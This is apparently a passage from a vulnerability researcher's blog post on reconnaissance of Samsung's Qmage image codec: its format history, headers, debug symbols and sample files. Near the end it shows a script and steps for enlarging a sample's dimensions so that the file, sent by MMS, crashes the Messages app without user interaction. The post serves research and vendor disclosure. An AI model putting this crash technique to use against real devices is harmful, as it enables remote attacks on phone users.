    └── Vp8XxD_QMG
        ├── VP8LNew_QMG
        ├── WebPResetDecParams_QMG
        ├── VP8InitIoInternal_QMG
        ├── VP8LDecodeHeader_QMG
        └── XxDecodeImageData__QMG
Instead of adding new compression types, the QG2.0 format seems to build on and improve the existing ones. It also imports the zlib 1.2.8 library, with each of its functions prepended with the qme_ prefix, and a whole second copy of libwebp (one is already used by Skia), with all of its symbols appended with a _QMG suffix. One could presume that the addition of libwebp indicates some kind of webp-in-qmage "inception" feature, but based on the fact that a great majority of the library is never referenced, it's more likely that Qmage simply borrows a few functions from libwebp, but just happens to link in the whole library. It was one of many unorthodox development practices that had been apparent in the codec so far.
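The naming convention described here makes it easy to bucket symbols by their likely origin. The following is only a rough sketch: it assumes you already have a list of symbol names (for instance exported from a disassembler), and the bucket labels are my own. Note that a Qmage-specific wrapper such as Vp8XxD_QMG also carries the _QMG suffix, so the "libwebp" bucket is an approximation.

```python
from collections import Counter

def classify_symbol(name):
    """Guess the origin of a symbol from the prefix/suffix convention in the post."""
    if name.startswith("qme_"):
        return "zlib"      # zlib functions are prefixed with qme_
    if name.endswith("_QMG"):
        return "libwebp"   # libwebp symbols carry a _QMG suffix
    return "other"

def summarize(symbols):
    """Count how many symbols fall into each bucket."""
    return Counter(classify_symbol(s) for s in symbols)

# A handful of names taken from the call tree above.
SAMPLE_SYMBOLS = [
    "qme_inflateInit", "qme_inflate", "qme_inflateEnd",
    "VP8LNew_QMG", "VP8LDecodeHeader_QMG", "XxDecodeImageData__QMG",
    "QmageDiffZipDecode", "Qmage7zUnCompress",
]

if __name__ == "__main__":
    for origin, count in sorted(summarize(SAMPLE_SYMBOLS).items()):
        print(f"{origin}: {count}")
```

Comparing such counts against the set of symbols that are actually referenced would be one way to check the observation that most of the imported library is never used.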
I hope this sheds some light on the structure of the code and the versioning of .qmg files. With some basic knowledge of the inner workings of the format, we can now look for some actual examples of such images to play and experiment with.

Finding input samples

Based on the available information, we can presume that the Qmage format was not introduced in Skia for user-generated content, but rather for static resources in Samsung-manufactured APKs (built-in apps and themes). This is where we can look for an initial set of test cases for fuzzing and manual experimentation. However, please note that throughout the years, APK resources in Samsung firmwares have shipped in a variety of formats and file extensions:
  • Qmage (.qmg, .qio)
  • ASTC (.astc, .atc)
  • PNG (.png, .pio)
  • BMP (.bmp)
  • JPEG (.jpeg)
  • SVG (.svg)
  • webp (.webp)
  • SPR (.spr)
  • Binary XML (.xml)

It is not clear to me how the device model, Android version, year of release, country code or other characteristics of a specific Samsung firmware determine which format is used for a given resource in a given app. Sometimes all bitmaps were encoded in a single format (e.g. PNG, Qmage, ASTC), and in other cases up to six different formats were used in the scope of one APK. This is still largely a mystery to me. However, I can say for sure that I have had the most luck finding .qmg files in the firmware of Android 4.4.4, 5.0.1, 5.1.1 and 6.0.1 for Samsung Galaxy Note 3, 4 and 5 released in 2014-2016. That said, please note that this is just an example and a variety of other firmwares also include Qmage samples.
As mentioned in the bug tracker entry, I have been able to identify legitimate QMv1, QG1.0 and QG1.1 samples during my research. While the codec for QG2.0 is present in Skia on Android 10, I haven't encountered any genuine bitmaps encoded in this new format thus far, despite spending a little bit of time looking for them. Consequently, in order to achieve a satisfying degree of code coverage of the QG2.0 codec, I had to synthesize such files through the fuzzing of existing QG1.x test cases that I had at my disposal. I'll go into this in more detail in the next blog post.
To obtain some actual files to look at, let's examine the firmware of Samsung Galaxy Note 4, Android 6.0.1, for Switzerland, built on 3 May 2016 (fun fact: about half of Project Zero is based in Switzerland). Once we have access to the system partition, we can dig into the default apps stored in /system/app and /system/priv-app. My go-to app to look for Qmage samples is /system/priv-app/SecSettings/SecSettings.apk. An APK is essentially a ZIP archive, so we can extract it, open it in our favorite file manager and browse to the res/ subdirectory. In there, we'll see:

We are interested in the drawable subdirectories, for example drawable-xxxhdpi-v4:

There they are, actual embedded Qmage files! They are noticeably mixed with some .pio (png) images, as well as a few other formats (webp, xml, jpeg, spr) not shown in the screenshot. Let's take the accessibility_light_easy_off.qmg file out for testing. In a hex editor, we can see that it's in fact a QG1.1 file (see first four bytes):

The basic header of Qmage files is 12 bytes long and has the following structure:

Field            Magic     Version         Flags  Qual.  Width      Height     Extra
Raw bytes        'Q' 'G'   0x01 0x01 0x01  0x28   0x5B   0x58 0x01  0x58 0x01  0x00
Interpreted as   QG        1.1.1           0x28   91     344        344        0
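The header layout above can be decoded mechanically. The following is a minimal sketch, assuming the field boundaries are as I read them from the table (a 2-byte magic, three version bytes, one byte each for flags and quality, little-endian 16-bit width and height, and one extra byte). The class and function names are hypothetical and not part of any Samsung or Quramsoft API.

```python
import struct
from typing import NamedTuple, Tuple

class QmageHeader(NamedTuple):
    magic: bytes
    version: Tuple[int, ...]
    flags: int
    quality: int
    width: int
    height: int
    extra: int

# "<" = little-endian with no padding; the sizes add up to 12 bytes.
_LAYOUT = struct.Struct("<2s3sBBHHB")

def parse_qmage_header(data):
    """Decode the basic 12-byte header of a static Qmage file."""
    if len(data) < _LAYOUT.size:
        raise ValueError("need at least 12 bytes")
    magic, ver, flags, quality, width, height, extra = _LAYOUT.unpack_from(data)
    return QmageHeader(magic, tuple(ver), flags, quality, width, height, extra)

# The 12 bytes shown in the table for accessibility_light_easy_off.qmg.
SAMPLE_HEADER = bytes.fromhex("5147010101285b5801580100")

if __name__ == "__main__":
    print(parse_qmage_header(SAMPLE_HEADER))
```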
So in this example, we are dealing with a lossy (quality 91/100) bitmap with 344x344 dimensions. Let's try to get it loaded on a real device to see if it's displayed correctly. To achieve that, it is important to give the file a standard image extension such as .png or .jpg, since .qmg files are not recognized as images by default. Once we change the extension and copy the file to a Samsung phone, we can view it in Gallery or any other app which displays bitmaps:

It works! What happens if we send the Qmage image via MMS?

Success again. This confirms that Qmage files are indeed seamlessly supported on Samsung devices the same way other standard formats are, which makes them an equally important attack surface. We can now fire up a debugger, attach it, for example, to the Gallery process, set a breakpoint on one of the codec entry points and follow the execution flow to better understand how it works. We can also start manually flipping bits to see how resistant the codec is against corrupted input, or collect the samples in preparation for an automated fuzzing session. With a number of valid Qmage-encoded files to play with, our testing capabilities are suddenly greatly extended. Before we get to that, though, let's see if we can find any more debug symbols or other publicly available metadata, which might prove useful in future bug root cause analysis or exploit development.

Finding traces of open-source code

In the early stages of exploring old or obscure technologies, I like to refer to GitHub as a source of information. It can help identify open-source code related to the subject in question, otherwise not indexed by web search engines and hard to find by the usual means. This worked well here as well – when I typed "qmage" into the search box, I got a number of interesting hits. Perhaps the most helpful one revealed that Samsung used to open-source its custom Skia modifications, including a wrapper class for Qmage. To access it through the official channels, you can go to, navigate to RELEASE CENTER → Mobile, and look for packages with names containing "_LL_", and with over 1.0 GB in size (for example The two letters most likely signify the Android version, i.e. LL for Android Lollipop (version 5.x).

The relevant file in the bundle is Platform.tar.gz/vendor/samsung/packages/apps/SBrowser/src/platform/kk/external/skia/src/images/SkImageDecoder_libqmage.cpp. I suspect that the "kk" subdirectory name relates to Android KitKat (version 4.4.4), whose release time frame coincides with the period when Qmage in Skia was first spotted in Samsung firmware (around June 2014). The code itself doesn't contain too much detail about the internals of the codec, as it delegates the actual parsing work to the QuramQmageDecParseHeader and QuramQmageDecodeFrame functions mentioned before. On the other hand, it gave me some psychological comfort and motivation to look for further clues and information – perhaps I wouldn't have to be limited to just ARM assembly and reverse-engineered structure layouts with made up field names, after all.

More Qmage versions, parsers, and symbols – QMG boot animations

I will try to keep this section as brief as possible, even though it could easily fill a whole blog post on its own. The history of the Qmage format in Samsung devices is in fact much longer than the time span between 2014 and 2020 – before being incorporated in Skia, it had been used as the container format for boot and shutdown animations since early versions of Samsung Android, and theme resources in the pre-Android era. If you browse some mobile phone-related forums such as XDA Developers or, you will find a number of references to "Qmage" and "qmg" in those contexts. You can also check for yourself, by looking for .qmg files on the file system of a modern Samsung phone. On my Note 10+, I can find the following three:
  • /system/media/bootsamsungloop.qmg
  • /system/media/bootsamsung.qmg
  • /system/media/shutdown.qmg

Since these files represent animations and not static bitmaps, they are encoded differently than the Qmage samples we have seen so far. Let's have a look at their headers:
d2s:/ $ for file in /system/media/*.qmg; do xxd -g 1 -l 16 $file; done
00000000: 51 4d 0f 00 80 00 a0 05 e0 0b 00 20 7b 50 00 00  QM......... {P..
00000000: 51 4d 0f 00 80 00 a0 05 e0 0b 00 20 7b 50 00 00  QM......... {P..
00000000: 51 4d 0f 00 80 00 a0 05 e0 0b 00 20 83 50 00 00  QM......... .P..
d2s:/ $
They are stored in the old, familiar "QM" format, but with the version byte set to 0x0F instead of 0x01. Based on my research, I have concluded that QM animations have been assigned versions starting with 0x0B (11) up to 0x0F (15), which is currently the most recent one. The exact logic behind this versioning system is unknown; one unconfirmed hypothesis is that QM animation versions are expressed as X+10 where X is the corresponding static format version. Importantly, the animated images don't seem to be compatible with the static ones, so they cannot be easily used as input test cases for Skia.
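The version check described above can be expressed in a few lines. This is a sketch under the post's own assumptions: the version byte sits at offset 2, animation versions span 0x0B to 0x0F, and the "X+10" relationship to static versions is the unconfirmed hypothesis mentioned in the text. The function name and the returned dictionary are illustrative.

```python
# Animation versions observed in the post: 0x0B (11) through 0x0F (15).
ANIMATION_VERSIONS = range(0x0B, 0x10)

def describe_qm_header(header):
    """Classify a 'QM' header as a static image or an animation by its version byte."""
    if len(header) < 3 or header[:2] != b"QM":
        raise ValueError("not a QM header")
    version = header[2]
    if version in ANIMATION_VERSIONS:
        # Unconfirmed hypothesis from the post: animation version = static version + 10.
        return {"kind": "animation", "version": version,
                "hypothetical_static_version": version - 10}
    return {"kind": "static", "version": version}

# First 16 bytes of /system/media/bootsamsung.qmg as printed by xxd above.
BOOT_HEADER = bytes.fromhex("514d0f008000a005e00b00207b500000")

if __name__ == "__main__":
    print(describe_qm_header(BOOT_HEADER))
```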
The animations are displayed by the /system/bin/bootanimation system executable, which in turn uses a dedicated library (currently around 600 kB) for parsing the files. On a high level, the libQmageDecoder interfaces are similar to Skia's, but the inner workings start to differ deeper down the call stack. A general overview of the header parsing control flow is shown below:
QmageDecParseHeader
└── QmageDecCommon_ParseHeader
    ├── QmageDecCommon_QmageAudioVersionCheck
    ├── QmageDecCommon_QGetDecoderInfo
    ├── QmageDecCommon_VGetDecoderInfo
    └── QmageDecCommon_WGetDecoderInfo
Within these functions, the following file signatures are being checked for: AUQM, NQ, QM, PFR, IM, IFEG, IT, QW. We have already seen most of them in Skia, but the first two on the list are completely new. This goes to show the depth of Quramsoft's portfolio in terms of the variety of invented file formats.
Furthermore, here is a simplified outline of the frame decoding process and the involved functions in the current version of the library on Android 10:
QmageDecodeAniFrame
├── checkDecodeQueue
│   └── QphotoThreadManager::checkDecodeQueue
│       └── QphotoThreadPool::run
│           └── QmageJob::run
│               └── Qmage_WDecodeAniFrameThreadJob_Low
│                   └── Qmage_WDecodeFrame_Low
│                       └── _QM_WCodec_decode
│                           └── PVcodecDecoderIndex
│                           └── PVcodecDecoderGrayScale
│                           └── PVcodecDecoder
└── Qmage_VDecodeAniFrame_Low
    ├── Qmage_VDecodeFrame_Low
    │   └── _QM_DecodeOneFrame_A9LL_TINY
    │   └── _QM_DecodeOneFrame_A9LL
    │   └── _QM_DecodeOneFrame_A9LL_alpha
    ├── _QM_DecodeOneFrame_A9LL_ani_LineSkip
    ├── _QM_DecodeOneFrame_A9LL_ani
    └── _QM_DecodeOneFrame_A9LL_ani_alpha
There are a number of previously unknown routines here under the Qmage_VDecode path, but there is also a very familiar subtree starting at Qmage_WDecodeFrame_Low, which we've already seen in Skia. But why is it even important, considering that boot animations are not really an attack surface? That's because the module in Samsung phones shipped with debug symbols for a long time – starting in mid-2010 with Android 2.1 (Eclair), up to various Samsung Android 4.3 firmwares published in 2013. During that time frame, the ELF file included not just function names, but also source file names and line numbers, full structure layouts, enum names, local variable names etc. It is a goldmine of useful information about the evolution of the codec during these years, and includes many details of the inner workings that still apply to this day.
For example, if we take the module from a Galaxy S Duos (Android 4.0.4, Jan 2013 build), we can use readelf and objdump to determine that:
  • The library compilation directory was /home2/cheus/Froyo/Froyo22_Qmage
  • It consisted of the following source files:
    • external/Qmage/QmageDecoderLIB/src/QmageDecCommon.c, 1547 lines of code
    • external/Qmage/QmageDecoderLIB/src/QmageDecoder.c, 219 LOC
    • external/Qmage/QmageDecoderLIB/src/Qmage_FDecoder_Low.c, 74 LOC
    • external/Qmage/QmageDecoderLIB/src/Qmage_VDecoder_Low.c, 3954 LOC
    • external/Qmage/QmageDecoderLIB/src/Qmage_WDecoder_Low.c, 5458 LOC
    • external/Qmage/QmageInterface/QmageInterface.c, 113 LOC
  • and the following headers:
    • external/Qmage/QmageDecoderLIB/src/QmageDecType.h
    • external/Qmage/QmageDecoderLIB/src/QmageDecCommon.h

We get access to some very helpful structures:
(gdb) ptype Qmage_DecderLowInfo
type = struct {
    QM_BOOL Ver200_SPEED;
    QM_BOOL IS_ANIMATION;
    QM_BOOL UseExtraException;
    QM_BOOL tiny;
    QM_BOOL IsDyanmicTable;
    QM_BOOL IsOpaque;
    QM_BOOL NearLossless;
    QMINT32 SIZE_SHIFT;
    QMINT32 ANI_RANGE;
    QMINT32 qp;
    QMINT32 mode_bit;
    QMINT32 header_len;
    QM_BOOL NotComp;
    QM_BOOL NotAlphaComp;
    QMINT32 alpha_decode_flag;
    QMINT32 depth;
    QMINT32 alpha_depth;
    Qmage_VDecoderVMODE_T mode;
    Qmage_V_DecoderVersion vversion;
    Qmage_F_DecoderVersion fversion;
    Qmage_DecoderVersion qversion;
    QmageDecodeCodecType rgb_encoder_mode;
    QmageDecodeCodecType alpha_encoder_mode;
    QmageRawImageType out_type;
}
(gdb)
and equally interesting enums:
not to mention some very clean decompiler output:

It was only after finding this extended debug metadata that I started to understand how parts of the codec actually worked. I would highly recommend referring to these symbols if you are planning to perform any Qmage-related research; many of them may even be cleanly ported to a modern Skia disassembly database.
During a similar time frame around 2010, Samsung was still producing non-Android mobile phones, which also have traces of Qmage in their underlying custom OS. Two examples of such devices are Samsung GT-B5722 (released in 2009) and Samsung GT-C5010 Squash (released in 2010):

Their firmware was again compiled with debug data built in, with many references to Qmage too. Let's take a look at the B5722 firmware – it contains a B5722_Master.x file which is a fairly regular ARM ELF executable, so we can load it in gdb-multiarch or IDA Pro and browse around or dump some types. As an example, we can find our favorite Qmage_WDecodeFrame_Low function, and explore its ascendants and descendants in the function control flow:
lkres_IFEGBodyDecode
│
├── QmageDecodeAniFrame
│   └── Qmage_VDecodeAniFrame_Low
│       ├── Qmage_VDecodeFrame_Low
│       │   ├── _QM_DecodeOneFrame_A9LL_TINY
│       │   ├── _QM_DecodeOneFrame_A9LL
│       │   └── _QM_DecodeOneFrame_A9LL_alpha
│       ├── _QM_DecodeOneFrame_A9LL_ani
│       └── _QM_DecodeOneFrame_A9LL_ani_alpha
├── QmageDecodeFrame
│   ├── Qmage_VDecodeFrame_Low
│   ├── Qmage_FDecodeFrame_Low
│   └── Qmage_WDecodeFrame_Low
│       └── _QM_WCodec_decode
│           ├── _QM1st_decode
│           └── _QM_WCodec_2nd_decode
└── IFEGDecodeFrame
    ├── IFEGDecodeFrame_DCT
    ├── IFEGDecodeFrame_Pad
    └── IFEGDecodeFrame_NoPad
In the above tree, we can recognize the "V" codec and the subtree responsible for processing animations, and the "W" codec handling static bitmaps, but there is also a whole new branch of code related to the decoding of IFEG. As you may remember from earlier in this post, this was one of the left-over magic values looked for by QmageDecCommon_VersionCheck_Rev8253_140615 in modern Skia – now we can see the format was actually used 10+ years ago. Additionally, all three of these code paths have a common ancestor in the lkres_IFEGBodyDecode function, which shows even more clearly that the IFEG and Qmage formats are closely related, with the former likely being some form of a predecessor of the latter. We can also verify that GT-B5722's embedded resources were encoded in both formats, by inspecting the B5722_Master.cfg file which enumerates the contents of the B5722_Master.tfs binary blob:
FILE_NAME : /a/images/13_pictbridge_pictbridge_top.ifg
FILE_SIZE : 6908
FILE_NAME : /a/images/13_pictbridge_pictbridge_top_hui.ifg
FILE_SIZE : 4766
FILE_NAME : /a/images/13_pictbridge_progress_bg.ifg
FILE_SIZE : 1304
FILE_NAME : /a/images/13_pictbridge_progress_bg_hui.ifg
FILE_SIZE : 594
FILE_NAME : /a/images/13_pictbridge_sending_ani01.ifg
[...]
FILE_NAME : /a/multimedia/imgapp/imgapp_default_image.qmg
FILE_SIZE : 39128
FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_detail.qmg
FILE_SIZE : 800
FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_detail_focus.qmg
FILE_SIZE : 1152
FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_edit.qmg
FILE_SIZE : 1340
FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_edit_focus.qmg
Based on this, we now know that Qmage files (in some shape) made their first appearance in Samsung devices around 2009-2010. But what about IFEG, and for how long has Samsung been shipping Quramsoft decoders? To answer that question, I delved into even older builds of the firmware and tried to bisect the debut of the custom codecs. The first ever phone that I have confirmed to use the IFEG format is Samsung SGH-D600, which launched in 2005. Almost all of its resources are encoded as .ifg files, and the software itself contains a number of relevant strings such as lk_ifegDecode, IFEGGetVersion, IFEGGetImageSize, IFEGDecodeFrame etc. This seems in line with Quramsoft's own declaration that their collaboration with Samsung started around June 2005. 
To make the story even more complex, the vendor was not even called "Quram" at the time; it was known under the name "I-master". Even though the switch to the current name took place in 2007, artifacts such as symbol names containing "Imaster" or "IM" could be found in Samsung's libraries for a few more years, e.g. Imaster_Malloc, ImasterVDecoder_ParseHeader, ImasterVDecErr_FAIL, IM_DecodeOneFrame_A9LL, etc. This could explain the meaning of the obsolete "IM" file signature mentioned earlier in this post, which I have seen used only once – as the container for boot animations on the very first Samsung phone running Android, Samsung GT-I7500 Galaxy released in 2009. What a ride! :)
To gather all this information in one place, I have compiled the following timeline showing the development of all Quramsoft image codecs I have observed shipping in Samsung devices over the years. While the presented data is based on my examination of dozens of firmwares, the Android ecosystem is a vastly complex one and involves thousands of software builds, so I make no promises as to the accuracy of the analysis below. If you spot any errors or inconsistencies that you can correct, please reach out and I will be happy to update this post.

As we can see, while Qmage has "only" been natively supported on Samsung Android since late 2014, the history of collaboration between Samsung and Quramsoft has lasted much longer. Reverse engineering these older binaries provided me with a lot of interesting insights, and pragmatically useful information such as the debug symbols from non-stripped executables. The extra context proved valuable later in the project and quite honestly, it also satisfied my curiosity, which is an important part. :)

Initial pokes at the codec

With all this historic background behind us, it's time to see how the codec can be broken today, or rather could be broken before the May 2020 update. Let's go back to the original accessibility_light_easy_off.qmg sample we extracted before. We can open it in a hex editor again, and to start with a simple test, consider which parts are most likely to cause problems when corrupted. For bitmaps, the obvious candidates are the dimensions, so I modified the width and height just slightly (344 → 345) and tried to open it in Gallery on a system with the February 2020 patch level:

It wouldn't load anymore. It's worth noting that the Qmage codec is packed with __android_log_print calls, so we can grep for them with logcat to get some more information on what happened:
d2s:/ $ logcat -v tag | egrep "QG|Qmage"
E/QG      : Qmage decoder error return value -298
E/Qmage   : Qmage QuramQmageDecodeFrame offset <= 0, offset: -298
These log messages tend to be helpful from time to time, so it's worth keeping them in mind. With such a small change in the file, nothing bad seems to have happened, beyond a rightful error being thrown by the codec. What if we increase the dimensions even more, let's say from 0x158 (344) each to 0x558 (1368) each?
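The same header edits can be scripted rather than made by hand in a hex editor. The sketch below assumes the width and height are little-endian 16-bit fields at offsets 6 and 8, as in the header table earlier in this post; the function name is hypothetical, and the code only rewrites bytes without attempting to keep the file valid.

```python
import struct

WIDTH_OFFSET = 6    # assumed from the header table: 0x58 0x01 -> 344
HEIGHT_OFFSET = 8   # the height follows immediately after the width

def patch_dimensions(data, width, height):
    """Return a copy of a Qmage file with its header dimensions overwritten."""
    if len(data) < 12:
        raise ValueError("need at least the 12-byte basic header")
    patched = bytearray(data)
    # Width and height are adjacent, so both can be written in one call.
    struct.pack_into("<HH", patched, WIDTH_OFFSET, width, height)
    return bytes(patched)

# The 12 header bytes of the QG1.1 sample shown earlier.
SAMPLE_HEADER = bytes.fromhex("5147010101285b5801580100")

if __name__ == "__main__":
    print(patch_dimensions(SAMPLE_HEADER, 345, 345).hex(" "))
    print(patch_dimensions(SAMPLE_HEADER, 0x558, 0x558).hex(" "))
```

For a real test, read the whole .qmg file, patch it, and write the result out under an image extension such as .png so that the device treats it as a picture.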

Let's try it:

The Gallery app instantly crashes. The full context can be extracted with logcat:
130|d2s:/ $ logcat -b crash -v raw
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x700b9ffc90 in tid 12442 (thumbThread2), pid 12395 (droid.gallery3d)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/d2sxx/d2s:10/QP1A.190711.020/N975FXXS2BTA7:user/release-keys'
Revision: '24'
ABI: 'arm64'
pid: 12395, tid: 12442, name: thumbThread2  >>> <<<
uid: 10125
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x700b9ffc90
    x0  0000000000000000  x1  0000000000000558  x2  fffffffffffffaa8  x3  0000000000000011
    x4  000000700ba00700  x5  0000000000000003  x6  0000000000000000  x7  0000000000000016
    x8  0000000000000000  x9  00000000000003d2  x10 0000000000000004  x11 000000701bc85a16
    x12 0000000000000000  x13 000000701bec0c0f  x14 000000700fc4e00d  x15 000000000000000d
    x16 0000000000000018  x17 0000000000000000  x18 000000703a846000  x19 0000000000000305
    x20 000000700b9ffc90  x21 000000700fb32a80  x22 000000700fb8f200  x23 0000000000088926
    x24 000000005650868a  x25 000000701bec0c00  x26 00000000000003d2  x27 0000000000000007
    x28 0000000000000020  x29 000000703ac3e5f0
    sp  000000703ac3e390  lr  000000700ba00740  pc  0000007136b20d18

backtrace:
      #00 pc 00000000002bbd18  /system/lib64/ (PVcodecDecoder_GrayScale_16bits_NEW+3636) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #01 pc 000000000029cefc  /system/lib64/ (__QM_WCodec_decode+948) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #02 pc 000000000029c9b0  /system/lib64/ (Qmage_WDecodeFrame_Low_Rev14474_20150224+320) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #03 pc 000000000029ae78  /system/lib64/ (QuramQmageDecodeFrame_Rev14474_20150224+164) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #04 pc 00000000006e1eec  /system/lib64/ (SkQmgCodec::onGetPixels(SkImageInfo const&, void*, unsigned long, SkCodec::Options const&, int*)+1100) (BuildId: fcab350692b134df9e8756643e9b06a0)
[...]
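A few numbers in this crash dump can be cross-checked with simple arithmetic. The sketch below uses only values copied from the log. The interpretation is my own reading rather than something the dump states: x1 holds 0x558, the same value written into the header, and x2 is its two's-complement negation, which suggests (but does not prove) that the corrupted dimension feeds the faulting address computation.

```python
MASK64 = (1 << 64) - 1

def to_signed64(value):
    """Interpret a 64-bit register value as a two's-complement signed integer."""
    value &= MASK64
    return value - (1 << 64) if value >> 63 else value

# Values copied from the crash log above.
PC = 0x0000007136B20D18
FRAME0_MODULE_OFFSET = 0x2BBD18   # "#00 pc 00000000002bbd18"
FRAME0_SYMBOL_DELTA = 3636        # "PVcodecDecoder_GrayScale_16bits_NEW+3636"
X1 = 0x0000000000000558
X2 = 0xFFFFFFFFFFFFFAA8
X20 = 0x000000700B9FFC90
FAULT_ADDR = 0x700B9FFC90

# Load address of the module: absolute pc minus the offset within the module.
module_base = PC - FRAME0_MODULE_OFFSET
# Offset of the start of the crashing function within the module.
function_offset = FRAME0_MODULE_OFFSET - FRAME0_SYMBOL_DELTA

if __name__ == "__main__":
    print("module base:      ", hex(module_base))
    print("function offset:  ", hex(function_offset))
    print("x2 as signed:     ", to_signed64(X2))
    print("x1 == -x2:        ", X1 == -to_signed64(X2))
    print("x20 == fault addr:", X20 == FAULT_ADDR)
```

The computed module base is page-aligned, which is a useful sanity check that the pc value and the backtrace offset belong to the same mapping.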
The fact that such a trivial change to the file header was sufficient to trigger a crash did not bode well for the security of the codec. In my experience, no decently tested image parser would crash on such an obvious inconsistency. Then I remembered that the Samsung Messages app also displayed Qmage files, so I sent the malformed image via MMS to see what would happen. To my disbelief, the exact same crash reproduced again, this time in the Messages process, and with no user interaction required:
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x702ae96b10 in tid 15454 (pool-5-thread-1), pid 7904 (droid.messaging)
[...]
pid: 7904, tid: 15454, name: pool-5-thread-1  >>> <<<
This result had to mean that the Messages app automatically decoded images found in incoming messages, even before the user manually opened them. It was a big moment in my research, one which opened the seemingly fragile attack surface to remote exploitation by only knowing the victim's phone number. At that point, I was convinced that the best course of action was to run a thorough coverage-guided fuzzing session of the codec, and report all identified crashes to the vendor. This became my focus for the next couple of weeks, until I documented my findings and filed Issue #2002 in the PZ bug tracker at the end of January 2020. The fuzzing effort will be the subject of the next blog post in the Qmage series. Stay tuned!

Conclusion

It is remarkable that such an attractive vulnerability research area managed to stay out of the public eye for so long. I expect that it was caused primarily by the closed-source nature of the code, and the fact that the implementation was buried so deep down in the image decoding stack that nobody expected to find custom OEM code of that extent there. I know I likely wouldn't have found it, if not for my lack of familiarity with Skia on Android, and the desire to learn where the execution of the BitmapFactory interface eventually ended up (coupled with having a Samsung build of at hand). The fact that there are virtually no references or mentions of this technology online certainly didn't help.
In this write-up, I shared the results of the reconnaissance phase I went through shortly after discovering the codec. As is often the case in my line of work, this process involved spelunking in some pretty archaic areas of code for extended periods of time, to become somewhat of an expert in an obscure field that will never again prove useful outside of this project. :-) Still, I am hoping that it was an interesting read for those who, like me, enjoy some software archeology, and that it also makes a good reference guide to anyone who plans to continue working on Qmage security in the future.  
It is crucial that the security claims made by vendors are constantly challenged, and relevant attack surfaces are exposed and documented. When mistakes happen, it's at the expense of end user security and privacy, and rarely at the expense of the vendor. This is why it's increasingly important both for vendors to follow best practices for security and software testing, and for a vigilant security community to ensure that the same mistakes aren't made again.